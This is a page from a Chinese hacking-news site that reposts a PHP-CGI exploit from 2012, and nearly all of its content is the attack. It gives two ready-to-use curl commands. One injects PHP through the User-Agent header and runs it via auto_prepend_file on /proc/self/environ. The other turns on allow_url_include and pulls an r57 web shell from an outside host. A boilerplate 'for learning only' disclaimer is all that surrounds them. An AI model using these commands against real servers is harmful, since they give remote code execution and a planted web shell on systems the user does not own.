WAP手机版 RSS订阅 加入收藏  设为首页
黑客新闻
当前位置:首页 > 黑客新闻

php-cgi漏洞利用EXP2012-05-11

时间:2019/7/7 11:05:55   作者:安琪   来源:www.hack361.com   阅读:1   评论:0
内容摘要:php-cgi漏洞利用EXP2012-05-111.本地包含直接执行代码:curl-H"USER-AGENT:<?system('id');die();?>"http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n2、远程包...

php-cgi漏洞利用EXP2012-05-11

1.本地包含直接执行代码: 
curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 

2、远程包含执行代码: 
curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt 


标签:php-cgi漏洞 
相关评论

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923